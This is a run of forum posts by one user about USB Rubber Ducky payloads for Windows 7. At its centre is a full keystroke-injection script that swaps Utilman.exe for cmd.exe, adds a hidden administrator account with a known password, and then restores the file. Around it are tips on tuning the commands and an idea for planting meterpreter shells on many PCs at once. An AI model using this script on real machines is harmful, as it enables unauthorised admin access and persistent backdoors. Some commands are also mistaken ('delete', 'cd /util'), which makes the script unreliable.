mackwage
-
Posts
17 -
Joined
-
Last visited
-
Days Won
1
Posts posted by mackwage
-
-
Great! Keep me up to date! :)
-
Refer to title. With the current reverse shell, there would be no way to handle pwning several boxes at once as netcat cannot juggle multiple connections. Was trying to think if during a physical pentest, you could use the ducky on every pc in sight to set a meterpreter session back to your computer so you have a shell on all of them at once.
Thoughts?
-
In Windows, installing Java doesn't put it in your system32 folder so you have to refer to the Java folder for the Java.exe. Or at least that's how it is on both of my Windows machines.
-
Thanks for the tip on the default delay.
I am using Win7 Ultimate x64. I manually walked through every step of the script and typed the commands in CMD to view their behavior.
icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T
This command didn't actually seem to change the permissions unless adding the "/grant administrators:F /T". I did some Google searching on the command to understand more how it works which lead to me adding the last part.
STRING xcopy cmd.exe util\
I changed the syntax and added a backslash at the end. Without the backslash at the end, xcopy will prompt and ask if it's a file or a directory.
STRING cd /util
STRING ren cmd.exe Utilman.exe
STRING cd ..
I had trouble getting the rename command to interact correctly with the file unless that file was in my working directory.
STRING xcopy %systemroot%\System32\util\Utilman.exe %systemroot%\System32\
I couldn't get xcopy to successfully copy from the util folder to the parent directory. I tried all sorts of variations and kept getting errors. So I just used the absolute path name instead.
STRING rmdir /s /q util
Without the /q trigger, rmdir will prompt you asking if you are sure you wish to delete it.
I'm also looking for the correct icacls command to change Utilman.exe back to the default permissions at the end of the script. Pwning the machine or not, I'd hate to leave it vulnerable for someone else to play with. :P
-
Minus the above thing, I had to change the syntax of some of the commands to get it to work on Windows7... specifically the icacls, ren, rmdir commands. As it was, it would prompt for an answer to the ren and rmdir commands so I added the trigger to suppress those. Also, I had to change the icacls syntax to allow full control of Utilman.exe. Then I added a short delay after each GUI command.
DELAY 200
GUI r
DELAY 50
STRING cmd
DELAY 50
ENTER
DELAY 50
STRING takeown /f "%systemroot%\System32\Utilman.exe"
ENTER
DELAY 50
STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T
ENTER
DELAY 50
STRING cd %systemroot%\System32
ENTER
DELAY 50
STRING mkdir util
ENTER
STRING xcopy cmd.exe util\
ENTER
DELAY 50
STRING ren Utilman.exe Utilman.exe.bak
ENTER
DELAY 50
STRING cd /util
ENTER
DELAY 50
STRING ren cmd.exe Utilman.exe
ENTER
DELAY 50
STRING cd ..
ENTER
DELAY 50
STRING xcopy %systemroot%\System32\util\Utilman.exe %systemroot%\System32\
ENTER
DELAY 50
STRING rmdir /s /q util
ENTER
DELAY 50
STRING exit
ENTER
DELAY 50
GUI u
STRING net user Local000 /add
ENTER
DELAY 50
STRING net localgroup administrators Local000 /add
ENTER
DELAY 50
STRING exit
ENTER
DELAY 50
GUI r
STRING cmd
ENTER
DELAY 50
STRING cd "%systemroot%\System32"
ENTER
DELAY 50
STRING delete Utilman.exe
ENTER
DELAY 50
STRING y
ENTER
DELAY 50
STRING ren Utilman.exe.bak Utilman.exe
ENTER
DELAY 50
STRING exit
ENTER
GUI r
DELAY 500
STRING cmd
DELAY 500
ENTER
DELAY 200
STRING net user Local000 *
ENTER
STRING hak5
ENTER
STRING hak5
ENTER
STRING exit
ENTER
-
I think it's the actual behavior of Windows. If you manually hit the Windows key, type cmd then hit shift f10, it does the same behavior.
-
I seem to have issues with the payload as is. The issue seems to be with the below lines:
MENU
STRING a
ENTER
I assume this is to right click on the CMD exe and run as administrator. However it seems to right click within the text box of the start menu. Does anyone else have this issue?
[Version 1] Emulating Other Usb Devices
in Classic USB Rubber Ducky
Posted
I apologize if this seems like a dumb question. I am seeking to understand the benefit in having the duck emulate other USB devices. Would it execute the malicious script any differently?